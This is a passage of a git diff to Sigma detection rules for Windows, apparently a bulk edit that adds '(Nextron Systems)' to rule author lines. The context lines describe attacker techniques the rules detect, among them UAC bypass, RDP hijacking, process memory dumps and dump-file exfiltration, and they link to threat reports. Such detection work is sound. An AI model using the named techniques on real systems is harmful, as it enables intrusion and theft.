a/rules/windows/process_creation/proc_creation_win_susp_schtasks_parent.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_schtasks_parent.yml @@ -4,7 +4,7 @@ status: experimental description: Detects suspicious scheduled task creations from a parent stored in a temporary folder references: - https://app.any.run/tasks/649e7b46-9bec-4d05-98a5-dfa9a13eaae5/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/02/23 modified: 2022/06/02 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_schtasks_pattern.yml b/rules/windows/process_creation/proc_creation_win_susp_schtasks_pattern.yml index ecf0c3399..a62e6125a 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_schtasks_pattern.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_schtasks_pattern.yml @@ -4,7 +4,7 @@ status: experimental description: Detects suspicious scheduled task creations with commands that are uncommon references: - https://app.any.run/tasks/512c1352-6380-4436-b27d-bb62f0c020d6/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/02/23 modified: 2022/11/18 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_schtasks_schedule_type.yml b/rules/windows/process_creation/proc_creation_win_susp_schtasks_schedule_type.yml index 6674297d6..e745e7a68 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_schtasks_schedule_type.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_schtasks_schedule_type.yml @@ -9,7 +9,7 @@ references: - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-change - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-create - http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/09/09 tags: - attack.execution diff --git a/rules/windows/process_creation/proc_creation_win_susp_schtasks_schedule_type_system.yml b/rules/windows/process_creation/proc_creation_win_susp_schtasks_schedule_type_system.yml index 1049368d1..afc05bea8 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_schtasks_schedule_type_system.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_schtasks_schedule_type_system.yml @@ -8,7 +8,7 @@ description: Detects scheduled task creations or modification to be run with hig references: - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-change - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-create -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/08/31 tags: - attack.execution diff --git a/rules/windows/process_creation/proc_creation_win_susp_screenconnect_access.yml b/rules/windows/process_creation/proc_creation_win_susp_screenconnect_access.yml index df35d9cc5..2b22b0275 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_screenconnect_access.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_screenconnect_access.yml @@ -4,7 +4,7 @@ status: test description: Detects ScreenConnect program starts that establish a remote access to that system (not meeting, not remote support) references: - https://www.anomali.com/blog/probable-iranian-cyber-actors-static-kitten-conducting-cyberespionage-campaign-targeting-uae-and-kuwait-government-agencies -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2021/02/11 modified: 2022/10/09 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_script_exec_from_env_folder.yml b/rules/windows/process_creation/proc_creation_win_susp_script_exec_from_env_folder.yml index f5cbf324a..4bd0f950a 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_script_exec_from_env_folder.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_script_exec_from_env_folder.yml @@ -4,7 +4,7 @@ status: test description: Detects a suspicious script executions in temporary folders or folders accessible by environment variables references: - https://www.virustotal.com/gui/file/91ba814a86ddedc7a9d546e26f912c541205b47a853d227756ab1334ade92c3f -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/02/08 tags: - attack.execution diff --git a/rules/windows/process_creation/proc_creation_win_susp_script_exec_from_temp.yml b/rules/windows/process_creation/proc_creation_win_susp_script_exec_from_temp.yml index 5796b670b..5689bcaa9 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_script_exec_from_temp.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_script_exec_from_temp.yml @@ -4,7 +4,7 @@ status: experimental description: Detects a suspicious script executions from temporary folder references: - https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/ -author: Florian Roth, Max Altgelt, Tim Shelton +author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton date: 2021/07/14 modified: 2022/10/05 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_service_dacl_modification_set_service.yml b/rules/windows/process_creation/proc_creation_win_susp_service_dacl_modification_set_service.yml index 3ea77b32e..21c9a0743 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_service_dacl_modification_set_service.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_service_dacl_modification_set_service.yml @@ -8,7 +8,7 @@ description: Detects suspicious DACL modifications via the "Set-Service" cmdlet references: - https://www.sans.org/blog/red-team-tactics-hiding-windows-services/ - https://docs.microsoft.com/pt-br/windows/win32/secauthz/sid-strings -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/10/18 tags: - attack.persistence diff --git a/rules/windows/process_creation/proc_creation_win_susp_service_dir.yml b/rules/windows/process_creation/proc_creation_win_susp_service_dir.yml index e06bb4d1b..8601274f1 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_service_dir.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_service_dir.yml @@ -4,7 +4,7 @@ status: test description: Detects a service binary running in a suspicious directory references: - https://blog.truesec.com/2021/03/07/exchange-zero-day-proxylogon-and-hafnium/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2021/03/09 modified: 2022/10/09 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_service_path_modification.yml b/rules/windows/process_creation/proc_creation_win_susp_service_path_modification.yml index e68a28a90..6d2a8dc58 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_service_path_modification.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_service_path_modification.yml @@ -5,7 +5,7 @@ description: Detects service path modification via the "sc" binary to a suspicio references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md - https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html -author: Victor Sergeev, oscd.community, Nasreddine Bencherchali (update) +author: Victor Sergeev, oscd.community, Nasreddine Bencherchali (Nextron Systems) date: 2019/10/21 modified: 2022/11/18 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_service_stop.yml b/rules/windows/process_creation/proc_creation_win_susp_service_stop.yml index 7df638f02..f13c47cd1 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_service_stop.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_service_stop.yml @@ -8,7 +8,7 @@ description: Detects the usage of one of the the commands to stop services such references: - https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus/Genshin%20Impact%20Figure%2010.jpg - https://www.trellix.com/en-sg/about/newsroom/stories/threat-labs/lockergoga-ransomware-family-used-in-targeted-attacks.html -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/09/01 modified: 2022/11/29 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_servu_exploitation_cve_2021_35211.yml b/rules/windows/process_creation/proc_creation_win_susp_servu_exploitation_cve_2021_35211.yml index 538c99dea..58e169f56 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_servu_exploitation_cve_2021_35211.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_servu_exploitation_cve_2021_35211.yml @@ -4,7 +4,7 @@ status: test description: Detects patterns as noticed in exploitation of Serv-U CVE-2021-35211 vulnerability by threat group DEV-0322 references: - https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2021/07/14 modified: 2022/12/18 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_servu_process_pattern.yml b/rules/windows/process_creation/proc_creation_win_susp_servu_process_pattern.yml index 0023d42c1..69f930f7e 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_servu_process_pattern.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_servu_process_pattern.yml @@ -4,7 +4,7 @@ status: experimental description: Detects a suspicious process pattern which could be a sign of an exploited Serv-U service references: - https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2021/07/14 modified: 2022/07/14 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_shellexec_rundll_usage.yml b/rules/windows/process_creation/proc_creation_win_susp_shellexec_rundll_usage.yml index 0fdfa6e11..ecb2824ea 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_shellexec_rundll_usage.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_shellexec_rundll_usage.yml @@ -9,7 +9,7 @@ references: - https://redcanary.com/blog/raspberry-robin/ - https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/ - https://github.com/SigmaHQ/sigma/issues/1009 -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/09/01 modified: 2022/12/30 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_shimcache_flush.yml b/rules/windows/process_creation/proc_creation_win_susp_shimcache_flush.yml index 3e7652c2d..5976aefcb 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_shimcache_flush.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_shimcache_flush.yml @@ -4,7 +4,7 @@ status: stable description: Detects actions that clear the local ShimCache and remove forensic evidence references: - https://medium.com/@blueteamops/shimcache-flush-89daff28d15e -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2021/02/01 tags: - attack.defense_evasion diff --git a/rules/windows/process_creation/proc_creation_win_susp_splwow64.yml b/rules/windows/process_creation/proc_creation_win_susp_splwow64.yml index 7ab1c7d94..d2dfe75fc 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_splwow64.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_splwow64.yml @@ -4,7 +4,7 @@ status: test description: Detects suspicious Splwow64.exe process without any command line parameters references: - https://twitter.com/sbousseaden/status/1429401053229891590?s=12 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2021/08/23 modified: 2022/12/25 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_svchost.yml b/rules/windows/process_creation/proc_creation_win_susp_svchost.yml index 7b3d03b93..f29b60edc 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_svchost.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_svchost.yml @@ -2,7 +2,7 @@ title: Suspicious Svchost Process id: 01d2e2a1-5f09-44f7-9fc1-24faa7479b6d status: experimental description: Detects a suspicious svchost process start -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2017/08/15 modified: 2022/06/28 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_sysprep_appdata.yml b/rules/windows/process_creation/proc_creation_win_susp_sysprep_appdata.yml index 548d53c0f..8cc79ea75 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_sysprep_appdata.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_sysprep_appdata.yml @@ -5,7 +5,7 @@ description: Detects suspicious sysprep process start with AppData folder as tar references: - https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets - https://app.any.run/tasks/61a296bb-81ad-4fee-955f-3b399f4aaf4b -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2018/06/22 modified: 2021/11/27 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_system_user_anomaly.yml b/rules/windows/process_creation/proc_creation_win_susp_system_user_anomaly.yml index a73d5208c..2f91b2cf3 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_system_user_anomaly.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_system_user_anomaly.yml @@ -5,7 +5,7 @@ description: Detects a suspicious process creation as SYSTEM user (suspicious pr references: - Internal Research - https://tools.thehacker.recipes/mimikatz/modules -author: Florian Roth (rule), David ANDRE (additional keywords) +author: Florian Roth (Nextron Systems), David ANDRE (additional keywords) date: 2021/12/20 modified: 2023/01/19 logsource: diff --git a/rules/windows/process_creation/proc_creation_win_susp_target_location_shell32.yml b/rules/windows/process_creation/proc_creation_win_susp_target_location_shell32.yml index 8739fcd18..9166033fe 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_target_location_shell32.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_target_location_shell32.yml @@ -4,7 +4,7 @@ status: experimental description: Detects shell32.dll executing a DLL in a suspicious directory references: - https://www.group-ib.com/resources/threat-research/red-curl-2.html -author: Christian Burkard +author: Christian Burkard (Nextron Systems) date: 2021/11/24 modified: 2022/09/13 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_taskmgr_localsystem.yml b/rules/windows/process_creation/proc_creation_win_susp_taskmgr_localsystem.yml index 3ac872847..3fbc8916a 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_taskmgr_localsystem.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_taskmgr_localsystem.yml @@ -2,7 +2,7 @@ title: Taskmgr as LOCAL_SYSTEM id: 9fff585c-c33e-4a86-b3cd-39312079a65f status: experimental description: Detects the creation of taskmgr.exe process in context of LOCAL_SYSTEM -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2018/03/18 modified: 2022/05/27 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_taskmgr_parent.yml b/rules/windows/process_creation/proc_creation_win_susp_taskmgr_parent.yml index afc123ceb..c87d37ee9 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_taskmgr_parent.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_taskmgr_parent.yml @@ -2,7 +2,7 @@ title: Taskmgr as Parent id: 3d7679bd-0c00-440c-97b0-3f204273e6c7 status: test description: Detects the creation of a process from Windows task manager -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2018/03/13 modified: 2021/11/27 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_trolleyexpress_procdump.yml b/rules/windows/process_creation/proc_creation_win_susp_trolleyexpress_procdump.yml index fa6eb47e3..142446702 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_trolleyexpress_procdump.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_trolleyexpress_procdump.yml @@ -5,7 +5,7 @@ description: Detects a possible process memory dump that uses the white-listed C references: - https://twitter.com/_xpn_/status/1491557187168178176 - https://www.youtube.com/watch?v=Ie831jF0bb0 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/02/10 modified: 2022/05/13 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_tscon_localsystem.yml b/rules/windows/process_creation/proc_creation_win_susp_tscon_localsystem.yml index 96e3eeef5..ab7e49900 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_tscon_localsystem.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_tscon_localsystem.yml @@ -6,7 +6,7 @@ references: - http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html - https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6 - https://www.ired.team/offensive-security/lateral-movement/t1076-rdp-hijacking-for-lateral-movement -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2018/03/17 modified: 2022/05/27 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_tscon_rdp_redirect.yml b/rules/windows/process_creation/proc_creation_win_susp_tscon_rdp_redirect.yml index 72af5bec0..4dff44429 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_tscon_rdp_redirect.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_tscon_rdp_redirect.yml @@ -5,7 +5,7 @@ description: Detects a suspicious RDP session redirect using tscon.exe references: - http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html - https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2018/03/17 modified: 2021/11/27 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_uac_bypass_trustedpath.yml b/rules/windows/process_creation/proc_creation_win_susp_uac_bypass_trustedpath.yml index f8dc617fd..91dbe36f5 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_uac_bypass_trustedpath.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_uac_bypass_trustedpath.yml @@ -6,7 +6,7 @@ references: - https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows - https://github.com/netero1010/TrustedPath-UACBypass-BOF -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2021/08/27 tags: - attack.defense_evasion diff --git a/rules/windows/process_creation/proc_creation_win_susp_userinit_child.yml b/rules/windows/process_creation/proc_creation_win_susp_userinit_child.yml index 18301a4a1..1b32046a1 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_userinit_child.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_userinit_child.yml @@ -4,7 +4,7 @@ status: test description: Detects a suspicious child process of userinit references: - https://twitter.com/SBousseaden/status/1139811587760562176 -author: Florian Roth (rule), Samir Bousseaden (idea) +author: Florian Roth (Nextron Systems), Samir Bousseaden (idea) date: 2019/06/17 modified: 2022/12/09 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_vbscript_unc2452.yml b/rules/windows/process_creation/proc_creation_win_susp_vbscript_unc2452.yml index e7225b837..f9c0ee7ef 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_vbscript_unc2452.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_vbscript_unc2452.yml @@ -4,7 +4,7 @@ status: test description: Detects suspicious inline VBScript keywords as used by UNC2452 references: - https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2021/03/05 modified: 2022/10/09 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_volsnap_disable.yml b/rules/windows/process_creation/proc_creation_win_susp_volsnap_disable.yml index 8bc386ef5..a098d0454 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_volsnap_disable.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_volsnap_disable.yml @@ -4,7 +4,7 @@ status: test description: Detects commands that temporarily turn off Volume Snapshots references: - https://twitter.com/0gtweet/status/1354766164166115331 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2021/01/28 modified: 2022/10/09 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_web_sysaidserver.yml b/rules/windows/process_creation/proc_creation_win_susp_web_sysaidserver.yml index b6f0fdb9b..6346928bd 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_web_sysaidserver.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_web_sysaidserver.yml @@ -4,7 +4,7 @@ status: experimental description: Detects suspicious child processes of SysAidServer (as seen in MERCURY threat actor intrusions) references: - https://www.microsoft.com/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabilities-in-unpatched-systems-to-target-israeli-organizations/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/08/26 logsource: category: process_creation diff --git a/rules/windows/process_creation/proc_creation_win_susp_wermgr.yml b/rules/windows/process_creation/proc_creation_win_susp_wermgr.yml index cbff1f31f..022b60575 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_wermgr.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_wermgr.yml @@ -6,7 +6,7 @@ references: - https://www.trendmicro.com/en_us/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html - https://www.echotrail.io/insights/search/wermgr.exe - https://github.com/binderlabs/DirCreate2System -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/10/14 modified: 2022/12/04 logsource: diff --git a/rules/windows/process_creation/proc_creation_win_susp_whoami.yml b/rules/windows/process_creation/proc_creation_win_susp_whoami.yml index 488f2efb4..309df4429 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_whoami.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_whoami.yml @@ -5,7 +5,7 @@ description: Detects the execution of whoami, which is often used by attackers a references: - https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/ - https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2018/08/13 modified: 2022/05/13 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_whoami_anomaly.yml b/rules/windows/process_creation/proc_creation_win_susp_whoami_anomaly.yml index c2c227cf9..413acb898 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_whoami_anomaly.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_whoami_anomaly.yml @@ -6,7 +6,7 @@ references: - https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/ - https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/ - https://www.youtube.com/watch?v=DsJ9ByX84o4&t=6s -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2021/08/12 modified: 2022/10/04 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_whoami_as_param.yml b/rules/windows/process_creation/proc_creation_win_susp_whoami_as_param.yml index ee3718c3e..4d47ad868 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_whoami_as_param.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_whoami_as_param.yml @@ -4,7 +4,7 @@ status: test description: Detects a suspicious process command line that uses whoami as first parameter (as e.g. used by EfsPotato) references: - https://twitter.com/blackarrowsec/status/1463805700602224645?s=12 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2021/11/29 modified: 2022/12/25 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_win_server_undocumented_rce.yml b/rules/windows/process_creation/proc_creation_win_susp_win_server_undocumented_rce.yml index 226abe7f8..936a5fe66 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_win_server_undocumented_rce.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_win_server_undocumented_rce.yml @@ -5,7 +5,7 @@ description: Detects potential exploitation attempt of undocumented Windows Serv references: - https://twitter.com/YanZiShuang/status/1616777483646533632?s=20&t=TQT9tUuPbQJai4v6HtsOQw - https://twitter.com/hackerfantastic/status/1616455335203438592?s=20 -author: Florian Roth, Nasreddine Bencherchali +author: Florian Roth (Nextron Systems), Nasreddine Bencherchali date: 2023/01/21 logsource: category: process_creation diff --git a/rules/windows/process_creation/proc_creation_win_susp_winrar_dmp.yml b/rules/windows/process_creation/proc_creation_win_susp_winrar_dmp.yml index 60fa04649..6cbd2747c 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_winrar_dmp.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_winrar_dmp.yml @@ -4,7 +4,7 @@ status: experimental description: Detects a suspicious winrar execution that involves a file with a .dmp extension, which could be a step in a process of dump file exfiltration references: - https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/01/04 modified: 2022/06/17 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_winrar_execution.yml b/rules/windows/process_creation/proc_creation_win_susp_winrar_execution.yml index 6fdd6bfe8..4b17df4e4 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_winrar_execution.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_winrar_execution.yml @@ -4,7 +4,7 @@ status: test description: Detects a suspicious winrar execution in a folder which is not the default installation folder references: - https://twitter.com/cyb3rops/status/1460978167628406785 -author: Florian Roth, Tigzy +author: Florian Roth (Nextron Systems), Tigzy date: 2021/11/17 modified: 2022/12/25 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_wmic_eventconsumer_create.yml b/rules/windows/process_creation/proc_creation_win_susp_wmic_eventconsumer_create.yml index 4a6501fc5..030dd9ae8 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_wmic_eventconsumer_create.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_wmic_eventconsumer_create.yml @@ -5,7 +5,7 @@ description: Detects WMIC executions in which a event consumer gets created in o references: - https://twitter.com/johnlatwc/status/1408062131321270282?s=12 - https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2021/06/25 modified: 2022/10/09 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_wmic_execution.yml b/rules/windows/process_creation/proc_creation_win_susp_wmic_execution.yml index 33525206a..f1ed5c2dd 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_wmic_execution.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_wmic_execution.yml @@ -6,7 +6,7 @@ references: - https://digital-forensics.sans.org/blog/2010/06/04/wmic-draft/ - https://www.hybrid-analysis.com/sample/4be06ecd234e2110bd615649fe4a6fa95403979acf889d7e45a78985eb50acf9?environmentId=1 - https://blog.malwarebytes.com/threat-analysis/2016/04/rokku-ransomware/ -author: Michael Haag, Florian Roth, juju4, oscd.community +author: Michael Haag, Florian Roth (Nextron Systems), juju4, oscd.community date: 2019/01/16 modified: 2022/08/29 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_wmic_proc_create.yml b/rules/windows/process_creation/proc_creation_win_susp_wmic_proc_create.yml index 2fffbd952..a3eb96a6d 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_wmic_proc_create.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_wmic_proc_create.yml @@ -5,7 +5,7 @@ description: Detects WMIC executing "process call create" with suspicious calls references: - https://thedfirreport.com/2020/10/08/ryuks-return/ - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker -author: Florian Roth, Nasreddine Bencherchali +author: Florian Roth (Nextron Systems), Nasreddine Bencherchali date: 2020/10/12 modified: 2022/11/18 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_wuauclt_cmdline.yml b/rules/windows/process_creation/proc_creation_win_susp_wuauclt_cmdline.yml index a3697107a..f88d67421 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_wuauclt_cmdline.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_wuauclt_cmdline.yml @@ -4,7 +4,7 @@ status: experimental description: Detects suspicious Windows Update Agent activity in which a wuauclt.exe process command line doesn't contain any command line flags references: - https://redcanary.com/blog/blackbyte-ransomware/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/02/26 modified: 2022/05/13 logsource: diff --git a/rules/windows/process_creation/proc_creation_win_sysinternals_psservice.yml b/rules/windows/process_creation/proc_creation_win_sysinternals_psservice.yml index 1bf0f90c8..aba0b3254 100644 --- a/rules/windows/process_creation/proc_creation_win_sysinternals_psservice.yml +++ b/rules/windows/process_creation/proc_creation_win_sysinternals_psservice.yml @@ -4,7 +4,7 @@ status: experimental description: Detects usage of Sysinternals PsService for service reconnaissance or tamper references: - https://docs.microsoft.com/en-us/sysinternals/downloads/psservice -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/06/16 tags: - attack.discovery diff --git a/rules/windows/process_creation/proc_creation_win_sysmon_disable_sharpevtmute.yml b/rules/windows/process_creation/proc_creation_win_sysmon_disable_sharpevtmute.yml index 2a47070a7..d6f4e6e9c 100644 --- a/rules/windows/process_creation/proc_creation_win_sysmon_disable_sharpevtmute.yml +++ b/rules/windows/process_creation/proc_creation_win_sysmon_disable_sharpevtmute.yml @@ -4,7 +4,7 @@ status: experimental description: Detects the use of SharpEvtHook, a tool to tamper with Windows event logs references: - https://github.com/bats3c/EvtMute -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/09/07 tags: - attack.defense_evasion diff --git a/rules/windows/process_creation/proc_creation_win_sysmon_exploitation.yml b/rules/windows/process_creation/proc_creation_win_sysmon_exploitation.yml index 89b23fde0..abf5273b0 100644 --- a/rules/windows/process_creation/proc_creation_win_sysmon_exploitation.yml +++ b/rules/windows/process_creation/proc_creation_win_sysmon_exploitation.yml @@ -6,7 +6,7 @@ references: - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41120 - https://twitter.com/filip_dragovic/status/1590052248260055041 - https://twitter.com/filip_dragovic/status/1590104354727436290 -author: Florian Roth, Tim Shelton (fp werfault) +author: Florian Roth (Nextron Systems), Tim Shelton (fp werfault) date: 2022/11/10 modified: 2022/12/30 tag: diff --git a/rules/windows/process_creation/proc_creation_win_sysmon_uac_bypass_eventvwr.yml b/rules/windows/process_creation/proc_creation_win_sysmon_uac_bypass_eventvwr.yml index d5d4ac134..d18244076 100644 --- a/rules/windows/process_creation/proc_creation_win_sysmon_uac_bypass_eventvwr.yml +++ b/rules/windows/process_creation/proc_creation_win_sysmon_uac_bypass_eventvwr.yml @@ -8,7 +8,7 @@ description: Detects UAC bypass method using Windows event viewer references: - 